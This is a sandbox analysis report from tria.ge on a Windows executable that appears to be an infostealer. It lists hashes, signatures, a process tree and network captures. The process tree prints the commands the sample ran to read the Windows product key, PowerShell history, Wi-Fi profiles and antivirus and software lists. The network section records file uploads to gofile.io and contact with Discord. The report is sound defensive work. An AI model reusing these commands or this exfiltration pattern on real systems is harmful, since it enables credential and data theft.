Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
62s -
max time network
67s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
08/06/2024, 13:34 UTC
Behavioral task
behavioral1
Sample
ConsoleApplication2.exe
Resource
win10v2004-20240508-en
General
-
Target
ConsoleApplication2.exe
-
Size
4.4MB
-
MD5
a0f170a09dcc8f9161efe47a518d5a01
-
SHA1
3fefa661fb68a1dd43ddff16202650e0b26ecb20
-
SHA256
06ab5377341cf38c3a3c6628b5bf91d545b7dcd153c629d5025582274a371f43
-
SHA512
eaefca62badab468db04dd77812318d50fab36fbc2ce7f2c08163dbda08207c2734a0829793fdacf5c2ac4c3de5d96c6f53f6d0555e5e6f6f145cef810257c44
-
SSDEEP
49152:M9v90k5HkzhwSUiUCAOygB+fEjGDYG12089DZujZGUOutEdNkzRvP61crzPBdWzc:M9v90kOnU7OyYjQsuhVPtd
Malware Config
Signatures
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
flow ioc 12 discord.com 20 discord.com 27 discord.com 36 discord.com 43 discord.com 51 discord.com 1 discord.com 4 discord.com -
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 37 ipinfo.io 52 ipinfo.io 1 ipinfo.io 2 ipinfo.io 4 ipinfo.io 5 ipinfo.io 21 ipinfo.io 30 ipinfo.io 13 ipinfo.io 44 ipinfo.io -
pid Process 3180 powershell.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1356 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 3568 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 460 systeminfo.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4900 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3268 powershell.exe 3268 powershell.exe 4636 powershell.exe 4636 powershell.exe 3180 powershell.exe 3180 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1832 WMIC.exe Token: SeSecurityPrivilege 1832 WMIC.exe Token: SeTakeOwnershipPrivilege 1832 WMIC.exe Token: SeLoadDriverPrivilege 1832 WMIC.exe Token: SeSystemProfilePrivilege 1832 WMIC.exe Token: SeSystemtimePrivilege 1832 WMIC.exe Token: SeProfSingleProcessPrivilege 1832 WMIC.exe Token: SeIncBasePriorityPrivilege 1832 WMIC.exe Token: SeCreatePagefilePrivilege 1832 WMIC.exe Token: SeBackupPrivilege 1832 WMIC.exe Token: SeRestorePrivilege 1832 WMIC.exe Token: SeShutdownPrivilege 1832 WMIC.exe Token: SeDebugPrivilege 1832 WMIC.exe Token: SeSystemEnvironmentPrivilege 1832 WMIC.exe Token: SeRemoteShutdownPrivilege 1832 WMIC.exe Token: SeUndockPrivilege 1832 WMIC.exe Token: SeManageVolumePrivilege 1832 WMIC.exe Token: 33 1832 WMIC.exe Token: 34 1832 WMIC.exe Token: 35 1832 WMIC.exe Token: 36 1832 WMIC.exe Token: SeIncreaseQuotaPrivilege 1832 WMIC.exe Token: SeSecurityPrivilege 1832 WMIC.exe Token: SeTakeOwnershipPrivilege 1832 WMIC.exe Token: SeLoadDriverPrivilege 1832 WMIC.exe Token: SeSystemProfilePrivilege 1832 WMIC.exe Token: SeSystemtimePrivilege 1832 WMIC.exe Token: SeProfSingleProcessPrivilege 1832 WMIC.exe Token: SeIncBasePriorityPrivilege 1832 WMIC.exe Token: SeCreatePagefilePrivilege 1832 WMIC.exe Token: SeBackupPrivilege 1832 WMIC.exe Token: SeRestorePrivilege 1832 WMIC.exe Token: SeShutdownPrivilege 1832 WMIC.exe Token: SeDebugPrivilege 1832 WMIC.exe Token: SeSystemEnvironmentPrivilege 1832 WMIC.exe Token: SeRemoteShutdownPrivilege 1832 WMIC.exe Token: SeUndockPrivilege 1832 WMIC.exe Token: SeManageVolumePrivilege 1832 WMIC.exe Token: 33 1832 WMIC.exe Token: 34 1832 WMIC.exe Token: 35 1832 WMIC.exe Token: 36 1832 WMIC.exe Token: SeDebugPrivilege 3268 powershell.exe Token: SeIncreaseQuotaPrivilege 1356 WMIC.exe Token: SeSecurityPrivilege 1356 WMIC.exe Token: SeTakeOwnershipPrivilege 1356 WMIC.exe Token: SeLoadDriverPrivilege 1356 WMIC.exe Token: SeSystemProfilePrivilege 1356 WMIC.exe Token: SeSystemtimePrivilege 1356 WMIC.exe Token: SeProfSingleProcessPrivilege 1356 WMIC.exe Token: SeIncBasePriorityPrivilege 1356 WMIC.exe Token: SeCreatePagefilePrivilege 1356 WMIC.exe Token: SeBackupPrivilege 1356 WMIC.exe Token: SeRestorePrivilege 1356 WMIC.exe Token: SeShutdownPrivilege 1356 WMIC.exe Token: SeDebugPrivilege 1356 WMIC.exe Token: SeSystemEnvironmentPrivilege 1356 WMIC.exe Token: SeRemoteShutdownPrivilege 1356 WMIC.exe Token: SeUndockPrivilege 1356 WMIC.exe Token: SeManageVolumePrivilege 1356 WMIC.exe Token: 33 1356 WMIC.exe Token: 34 1356 WMIC.exe Token: 35 1356 WMIC.exe Token: 36 1356 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4872 wrote to memory of 1516 4872 ConsoleApplication2.exe 78 PID 4872 wrote to memory of 1516 4872 ConsoleApplication2.exe 78 PID 4872 wrote to memory of 1516 4872 ConsoleApplication2.exe 78 PID 1516 wrote to memory of 4900 1516 cmd.exe 79 PID 1516 wrote to memory of 4900 1516 cmd.exe 79 PID 1516 wrote to memory of 4900 1516 cmd.exe 79 PID 4872 wrote to memory of 1364 4872 ConsoleApplication2.exe 80 PID 4872 wrote to memory of 1364 4872 ConsoleApplication2.exe 80 PID 4872 wrote to memory of 1364 4872 ConsoleApplication2.exe 80 PID 1364 wrote to memory of 1832 1364 cmd.exe 81 PID 1364 wrote to memory of 1832 1364 cmd.exe 81 PID 1364 wrote to memory of 1832 1364 cmd.exe 81 PID 4872 wrote to memory of 3852 4872 ConsoleApplication2.exe 83 PID 4872 wrote to memory of 3852 4872 ConsoleApplication2.exe 83 PID 4872 wrote to memory of 3852 4872 ConsoleApplication2.exe 83 PID 3852 wrote to memory of 3268 3852 cmd.exe 84 PID 3852 wrote to memory of 3268 3852 cmd.exe 84 PID 3852 wrote to memory of 3268 3852 cmd.exe 84 PID 4872 wrote to memory of 3824 4872 ConsoleApplication2.exe 85 PID 4872 wrote to memory of 3824 4872 ConsoleApplication2.exe 85 PID 4872 wrote to memory of 3824 4872 ConsoleApplication2.exe 85 PID 3824 wrote to memory of 1356 3824 cmd.exe 86 PID 3824 wrote to memory of 1356 3824 cmd.exe 86 PID 3824 wrote to memory of 1356 3824 cmd.exe 86 PID 4872 wrote to memory of 4248 4872 ConsoleApplication2.exe 87 PID 4872 wrote to memory of 4248 4872 ConsoleApplication2.exe 87 PID 4872 wrote to memory of 4248 4872 ConsoleApplication2.exe 87 PID 4248 wrote to memory of 4016 4248 cmd.exe 88 PID 4248 wrote to memory of 4016 4248 cmd.exe 88 PID 4248 wrote to memory of 4016 4248 cmd.exe 88 PID 4872 wrote to memory of 4992 4872 ConsoleApplication2.exe 89 PID 4872 wrote to memory of 4992 4872 ConsoleApplication2.exe 89 PID 4872 wrote to memory of 4992 4872 ConsoleApplication2.exe 89 PID 4992 wrote to memory of 1636 4992 cmd.exe 90 PID 4992 wrote to memory of 1636 4992 cmd.exe 90 PID 4992 wrote to memory of 1636 4992 cmd.exe 90 PID 4872 wrote to memory of 1500 4872 ConsoleApplication2.exe 91 PID 4872 wrote to memory of 1500 4872 ConsoleApplication2.exe 91 PID 4872 wrote to memory of 1500 4872 ConsoleApplication2.exe 91 PID 1500 wrote to memory of 2432 1500 cmd.exe 92 PID 1500 wrote to memory of 2432 1500 cmd.exe 92 PID 1500 wrote to memory of 2432 1500 cmd.exe 92 PID 4872 wrote to memory of 1912 4872 ConsoleApplication2.exe 93 PID 4872 wrote to memory of 1912 4872 ConsoleApplication2.exe 93 PID 4872 wrote to memory of 1912 4872 ConsoleApplication2.exe 93 PID 1912 wrote to memory of 4636 1912 cmd.exe 94 PID 1912 wrote to memory of 4636 1912 cmd.exe 94 PID 1912 wrote to memory of 4636 1912 cmd.exe 94 PID 4872 wrote to memory of 2116 4872 ConsoleApplication2.exe 95 PID 4872 wrote to memory of 2116 4872 ConsoleApplication2.exe 95 PID 4872 wrote to memory of 2116 4872 ConsoleApplication2.exe 95 PID 2116 wrote to memory of 3568 2116 cmd.exe 96 PID 2116 wrote to memory of 3568 2116 cmd.exe 96 PID 2116 wrote to memory of 3568 2116 cmd.exe 96 PID 4872 wrote to memory of 2716 4872 ConsoleApplication2.exe 97 PID 4872 wrote to memory of 2716 4872 ConsoleApplication2.exe 97 PID 4872 wrote to memory of 2716 4872 ConsoleApplication2.exe 97 PID 2716 wrote to memory of 460 2716 cmd.exe 98 PID 2716 wrote to memory of 460 2716 cmd.exe 98 PID 2716 wrote to memory of 460 2716 cmd.exe 98 PID 4872 wrote to memory of 2916 4872 ConsoleApplication2.exe 100 PID 4872 wrote to memory of 2916 4872 ConsoleApplication2.exe 100 PID 4872 wrote to memory of 2916 4872 ConsoleApplication2.exe 100 PID 2916 wrote to memory of 2440 2916 cmd.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\ConsoleApplication2.exe"C:\Users\Admin\AppData\Local\Temp\ConsoleApplication2.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4872 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ping -n 1 1.1.1.12⤵
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\SysWOW64\PING.EXEping -n 1 1.1.1.13⤵
- Runs ping.exe
PID:4900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic csproduct get uuid2⤵
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1832
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell Get-ItemPropertyValue -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault2⤵
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path win32_VideoController get name2⤵
- Suspicious use of WriteProcessMemory
PID:3824 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:1356
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get name2⤵
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic cpu get name3⤵PID:4016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get Caption /value2⤵
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic os get Caption /value3⤵PID:1636
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path win32_VideoController get currentrefreshrate2⤵
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path win32_VideoController get currentrefreshrate3⤵PID:2432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell Get-Content (Get-PSReadlineOption).HistorySavePath2⤵
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Get-Content (Get-PSReadlineOption).HistorySavePath3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4636
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tasklist2⤵
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\SysWOW64\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:3568
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo2⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh wlan show profile2⤵
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile3⤵PID:2440
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get /value2⤵PID:1160
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get /value3⤵PID:2848
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe -Command "Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate, InstallLocation"2⤵PID:5020
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate, InstallLocation"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3180
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get Caption /value2⤵PID:3864
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic os get Caption /value3⤵PID:1156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic csproduct get uuid2⤵PID:3576
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:1264
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get Caption /value2⤵PID:4356
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic os get Caption /value3⤵PID:4996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get Caption /value2⤵PID:4884
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic os get Caption /value3⤵PID:1720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic csproduct get uuid2⤵PID:4948
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:2912
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get Caption /value2⤵PID:3308
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic os get Caption /value3⤵PID:4740
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get Caption /value2⤵PID:236
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic os get Caption /value3⤵PID:4304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic csproduct get uuid2⤵PID:4672
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:4500
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get Caption /value2⤵PID:1628
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic os get Caption /value3⤵PID:568
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get Caption /value2⤵PID:3712
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic os get Caption /value3⤵PID:5008
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic csproduct get uuid2⤵PID:3964
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:4112
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get Caption /value2⤵PID:704
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic os get Caption /value3⤵PID:1500
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get Caption /value2⤵PID:2884
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic os get Caption /value3⤵PID:4400
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic csproduct get uuid2⤵PID:2836
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:2960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get Caption /value2⤵PID:2972
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic os get Caption /value3⤵PID:1804
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get Caption /value2⤵PID:2808
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic os get Caption /value3⤵PID:2816
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic csproduct get uuid2⤵PID:4156
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:4008
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get Caption /value2⤵PID:3888
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic os get Caption /value3⤵PID:1892
-
-
Network
-
Remote address:8.8.8.8:53Requestipinfo.ioIN AResponseipinfo.ioIN A34.117.186.192
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Requestapi.gofile.ioIN AResponseapi.gofile.ioIN A151.80.29.83api.gofile.ioIN A51.178.66.33api.gofile.ioIN A51.38.43.18
-
Remote address:8.8.8.8:53Request83.29.80.151.in-addr.arpaIN PTRResponse83.29.80.151.in-addr.arpaIN PTRns3048708ip-151-80-29eu
-
Remote address:8.8.8.8:53Requestdiscord.comIN AResponsediscord.comIN A162.159.138.232discord.comIN A162.159.136.232discord.comIN A162.159.137.232discord.comIN A162.159.128.233discord.comIN A162.159.135.232
-
Remote address:8.8.8.8:53Requestdiscord.comIN A
-
Remote address:8.8.8.8:53Request192.186.117.34.in-addr.arpaIN PTRResponse192.186.117.34.in-addr.arpaIN PTR19218611734bcgoogleusercontentcom
-
Remote address:8.8.8.8:53Requeststore9.gofile.ioIN AResponsestore9.gofile.ioIN A206.168.190.239
-
Remote address:8.8.8.8:53Request239.190.168.206.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request232.138.159.162.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requeststore10.gofile.ioIN AResponsestore10.gofile.ioIN A31.14.70.252
-
Remote address:8.8.8.8:53Request252.70.14.31.in-addr.arpaIN PTRResponse252.70.14.31.in-addr.arpaIN PTR31-14-70-252custmojifr
-
Remote address:8.8.8.8:53Requeststore1.gofile.ioIN AResponsestore1.gofile.ioIN A45.112.123.227
-
Remote address:8.8.8.8:53Request227.123.112.45.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requeststore3.gofile.ioIN AResponsestore3.gofile.ioIN A136.175.10.233
-
Remote address:8.8.8.8:53Request233.10.175.136.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requeststore4.gofile.ioIN AResponsestore4.gofile.ioIN A31.14.70.245
-
Remote address:8.8.8.8:53Requestdiscord.comIN AResponsediscord.comIN A162.159.136.232discord.comIN A162.159.128.233discord.comIN A162.159.138.232discord.comIN A162.159.137.232discord.comIN A162.159.135.232
-
Remote address:8.8.8.8:53Request245.70.14.31.in-addr.arpaIN PTRResponse245.70.14.31.in-addr.arpaIN PTR31-14-70-245custmojifr
-
Remote address:8.8.8.8:53Requestipinfo.ioIN AResponseipinfo.ioIN A34.117.186.192
-
Remote address:8.8.8.8:53Request232.136.159.162.in-addr.arpaIN PTRResponse
-
Remote address:31.14.70.252:443RequestPOST /uploadFile HTTP/1.1
Host: store10.gofile.io
Accept: */*
Content-Length: 200525
Content-Type: multipart/form-data; boundary=------------------------1133fc2b1e53fbd6
ResponseHTTP/1.1 200 OK
Date: Sat, 08 Jun 2024 13:35:14 GMT
Content-Type: application/json
Content-Length: 316
Connection: keep-alive
Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
-
Remote address:31.14.70.252:443RequestPOST /uploadFile HTTP/1.1
Host: store10.gofile.io
Accept: */*
Content-Length: 200525
Content-Type: multipart/form-data; boundary=------------------------797fa654c3e8f7dd
ResponseHTTP/1.1 200 OK
Date: Sat, 08 Jun 2024 13:35:40 GMT
Content-Type: application/json
Content-Length: 316
Connection: keep-alive
Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
-
853 B 4.8kB 9 8
-
-
853 B 4.8kB 9 8
-
912 B 6.0kB 10 13
-
209.4kB 7.5kB 164 58
-
-
-
-
-
2.0kB 5.1kB 10 9
-
853 B 4.9kB 9 9
-
-
912 B 6.0kB 10 13
-
208.1kB 9.3kB 164 118
HTTP Request
POST https://store10.gofile.io/uploadFileHTTP Response
200 -
-
-
-
2.0kB 5.1kB 10 9
-
853 B 4.9kB 9 9
-
-
-
912 B 5.9kB 10 12
-
208.0kB 8.4kB 165 84
-
-
2.0kB 5.1kB 10 9
-
-
-
853 B 4.9kB 9 9
-
912 B 5.9kB 10 12
-
207.9kB 8.2kB 161 78
-
-
-
-
2.0kB 5.1kB 10 9
-
853 B 4.8kB 9 8
-
-
-
964 B 6.0kB 11 13
-
263.6kB 10.2kB 199 129
HTTP Request
POST https://store10.gofile.io/uploadFileHTTP Response
200 -
-
2.0kB 5.1kB 10 9
-
853 B 4.8kB 9 8
-
-
-
912 B 5.9kB 10 12
-
208.0kB 8.4kB 164 84
-
-
-
2.0kB 5.1kB 10 9
-
853 B 4.8kB 9 8
-
-
-
912 B 5.9kB 10 12
-
-
-
207.8kB 8.8kB 161 113
-
365 B 515 B 6 5
DNS Request
ipinfo.io
DNS Response
34.117.186.192
DNS Request
8.8.8.8.in-addr.arpa
DNS Request
api.gofile.io
DNS Response
151.80.29.8351.178.66.3351.38.43.18
DNS Request
83.29.80.151.in-addr.arpa
DNS Request
discord.com
DNS Request
discord.com
DNS Response
162.159.138.232162.159.136.232162.159.137.232162.159.128.233162.159.135.232
-
1.0kB 1.6kB 15 15
DNS Request
192.186.117.34.in-addr.arpa
DNS Request
store9.gofile.io
DNS Response
206.168.190.239
DNS Request
239.190.168.206.in-addr.arpa
DNS Request
232.138.159.162.in-addr.arpa
DNS Request
store10.gofile.io
DNS Response
31.14.70.252
DNS Request
252.70.14.31.in-addr.arpa
DNS Request
store1.gofile.io
DNS Response
45.112.123.227
DNS Request
227.123.112.45.in-addr.arpa
DNS Request
store3.gofile.io
DNS Response
136.175.10.233
DNS Request
233.10.175.136.in-addr.arpa
DNS Request
store4.gofile.io
DNS Response
31.14.70.245
DNS Request
discord.com
DNS Response
162.159.136.232162.159.128.233162.159.138.232162.159.137.232162.159.135.232
DNS Request
245.70.14.31.in-addr.arpa
DNS Request
ipinfo.io
DNS Response
34.117.186.192
DNS Request
232.136.159.162.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5e080d58e6387c9fd87434a502e1a902e
SHA1ae76ce6a2a39d79226c343cfe4745d48c7c1a91a
SHA2566fc482e46f6843f31d770708aa936de4cc32fec8141154f325438994380ff425
SHA5126c112200ef09e724f2b8ab7689a629a09d74db2dcb4dd83157dd048cbe74a7ce5d139188257efc79a137ffebde0e3b61e0e147df789508675fedfd11fcad9ede
-
Filesize
18KB
MD585036561421ae49479d1b358c766ea67
SHA1cb395ef875dbbadb320eebb99c14035c5896c96d
SHA2568365b3b8650502ecc62be011ead8b92c6728081fc6a709153c4de9eff0475ddc
SHA51243f1808d425bcc65531ef79aaf589d136da0b0a093d6075bcfb0fb4936271d91fb71d4b3b4965440f8fa71fd1a18b54fce50215a39f27c7e7e36ee841196e4f6
-
Filesize
18KB
MD59e1ebcde1c5f1cce79cf8e9dce888f69
SHA134e096ca42a2395148e81849dd95fb5e95423621
SHA25621654195087df0c314773151bf2db21e486b98a7f3b5c252c877803269be3a19
SHA512567080314314b1449f6c4a525afd73b552c9f0cf60f1d178e45eba895790f0e6ba17c3eb828e5599c3ddef8b66f203ae668b6f261d3dc921c4dfcc2b60a1ba6a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
195KB
MD5616905862bcb7dddf4e71c5390046e30
SHA13ece26d7954604ecc5086e5813a727e553c9b1d8
SHA2560b0df3e7d4c3a8dff3261e3a798874935b9b3858edb72b247dd1f195bf6ba172
SHA51204eeace18d0753de44e5666da4c7ade18a9993733917e5180be6294e44d6dd2865a72262069098781f3ae84299b914c513def3680faf222bada92edf05119554